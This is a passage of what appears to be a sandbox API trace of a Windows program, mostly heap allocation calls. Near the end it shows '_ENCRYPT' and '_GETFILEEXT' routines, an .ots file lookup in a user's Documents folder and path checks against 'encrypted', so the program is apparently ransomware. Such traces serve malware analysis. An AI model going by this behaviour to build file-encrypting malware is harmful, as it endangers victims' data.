hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.688] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.689] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0035.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0035.690] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.690] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.691] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0035.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ca30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.692] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.692] CloseHandle (hObject=0x140) returned 1 [0035.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.692] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.693] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.693] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.693] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.693] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.693] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.693] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.693] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.694] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.694] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.694] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x573040a0, ftCreationTime.dwHighDateTime=0x1d5b5f6, ftLastAccessTime.dwLowDateTime=0xcc4266d0, ftLastAccessTime.dwHighDateTime=0x1d5c388, ftLastWriteTime.dwLowDateTime=0xcc4266d0, ftLastWriteTime.dwHighDateTime=0x1d5c388, nFileSizeHigh=0x0, nFileSizeLow=0x16907, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Ol52nfGJKPYhFqmJCtG.ots", cAlternateFileName="OL52NF~1.OTS")) returned 0x7c20c0 [0035.694] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.694] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.694] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x573040a0, ftCreationTime.dwHighDateTime=0x1d5b5f6, ftLastAccessTime.dwLowDateTime=0xcc4266d0, ftLastAccessTime.dwHighDateTime=0x1d5c388, ftLastWriteTime.dwLowDateTime=0xcc4266d0, ftLastWriteTime.dwHighDateTime=0x1d5c388, nFileSizeHigh=0x0, nFileSizeLow=0x16907, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Ol52nfGJKPYhFqmJCtG.ots", cAlternateFileName="OL52NF~1.OTS")) returned 0x7c20c0 [0035.694] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.694] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, 